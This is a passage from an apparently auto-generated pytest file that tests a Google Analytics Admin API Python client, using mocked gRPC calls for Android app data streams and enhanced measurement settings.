the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateAndroidAppDataStreamRequest() request.android_app_data_stream.name = "android_app_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: call.return_value = resources.AndroidAppDataStream() client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "android_app_data_stream.name=android_app_data_stream.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_android_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateAndroidAppDataStreamRequest() request.android_app_data_stream.name = "android_app_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) await client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "android_app_data_stream.name=android_app_data_stream.name/value", ) in kw["metadata"] def test_update_android_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_android_app_data_stream( android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].android_app_data_stream == resources.AndroidAppDataStream( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_android_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_android_app_data_stream( analytics_admin.UpdateAndroidAppDataStreamRequest(), android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_android_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_android_app_data_stream( android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].android_app_data_stream == resources.AndroidAppDataStream( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_android_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_android_app_data_stream( analytics_admin.UpdateAndroidAppDataStreamRequest(), android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_android_app_data_streams( transport: str = "grpc", request_type=analytics_admin.ListAndroidAppDataStreamsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse( next_page_token="next_page_token_value", ) response = client.list_android_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAndroidAppDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListAndroidAppDataStreamsPager) assert response.next_page_token == "next_page_token_value" def test_list_android_app_data_streams_from_dict(): test_list_android_app_data_streams(request_type=dict) def test_list_android_app_data_streams_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: client.list_android_app_data_streams() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAndroidAppDataStreamsRequest() @pytest.mark.asyncio async def test_list_android_app_data_streams_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListAndroidAppDataStreamsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAndroidAppDataStreamsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_android_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAndroidAppDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListAndroidAppDataStreamsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_android_app_data_streams_async_from_dict(): await test_list_android_app_data_streams_async(request_type=dict) def test_list_android_app_data_streams_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListAndroidAppDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse() client.list_android_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_android_app_data_streams_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListAndroidAppDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAndroidAppDataStreamsResponse() ) await client.list_android_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_android_app_data_streams_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_android_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_android_app_data_streams_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_android_app_data_streams( analytics_admin.ListAndroidAppDataStreamsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_android_app_data_streams_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAndroidAppDataStreamsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_android_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_android_app_data_streams_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_android_app_data_streams( analytics_admin.ListAndroidAppDataStreamsRequest(), parent="parent_value", ) def test_list_android_app_data_streams_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_android_app_data_streams(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.AndroidAppDataStream) for i in results) def test_list_android_app_data_streams_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) pages = list(client.list_android_app_data_streams(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_android_app_data_streams_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) async_pager = await client.list_android_app_data_streams(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.AndroidAppDataStream) for i in responses) @pytest.mark.asyncio async def test_list_android_app_data_streams_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_android_app_data_streams(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_enhanced_measurement_settings( transport: str = "grpc", request_type=analytics_admin.GetEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) response = client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" def test_get_enhanced_measurement_settings_from_dict(): test_get_enhanced_measurement_settings(request_type=dict) def test_get_enhanced_measurement_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: client.get_enhanced_measurement_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetEnhancedMeasurementSettingsRequest() @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) ) response = await client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_async_from_dict(): await test_get_enhanced_measurement_settings_async(request_type=dict) def test_get_enhanced_measurement_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetEnhancedMeasurementSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: call.return_value = resources.EnhancedMeasurementSettings() client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetEnhancedMeasurementSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) await client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_enhanced_measurement_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_enhanced_measurement_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_enhanced_measurement_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_enhanced_measurement_settings( analytics_admin.GetEnhancedMeasurementSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_enhanced_measurement_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_enhanced_measurement_settings( analytics_admin.GetEnhancedMeasurementSettingsRequest(), name="name_value", ) def test_update_enhanced_measurement_settings( transport: str = "grpc", request_type=analytics_admin.UpdateEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) response = client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" def test_update_enhanced_measurement_settings_from_dict(): test_update_enhanced_measurement_settings(request_type=dict) def test_update_enhanced_measurement_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: client.update_enhanced_measurement_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateEnhancedMeasurementSettingsRequest() @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) ) response = await client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_async_from_dict(): await test_update_enhanced_measurement_settings_async(request_type=dict) def test_update_enhanced_measurement_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateEnhancedMeasurementSettingsRequest() request.enhanced_measurement_settings.name = ( "enhanced_measurement_settings.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: call.return_value = resources.EnhancedMeasurementSettings() client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "enhanced_measurement_settings.name=enhanced_measurement_settings.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateEnhancedMeasurementSettingsRequest() request.enhanced_measurement_settings.name = ( "enhanced_measurement_settings.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) await client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "enhanced_measurement_settings.name=enhanced_measurement_settings.name/value", ) in kw["metadata"] def test_update_enhanced_measurement_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_enhanced_measurement_settings( enhanced_measurement_settings=resources.EnhancedMeasurementSettings( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[ 0 ].enhanced_measurement_settings == resources.EnhancedMeasurementSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_enhanced_measurement_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_enhanced_measurement_settings( analytics_admin.UpdateEnhancedMeasurementSettingsRequest(), enhanced_measurement_settings=resources.EnhancedMeasurementSettings( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_enhanced_measurement_settings( enhanced_measurement_settings=resources.EnhancedMeasurementSettings( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[ 0 ].enhanced_measurement_settings == resources.EnhancedMeasurementSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_enhanced_measurement_settings( analytics_admin.UpdateEnhancedMeasurementSettingsRequest(), enhanced_measurement_settings=resources.EnhancedMeasurementSettings( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_create_firebase_link( transport: str = "grpc", 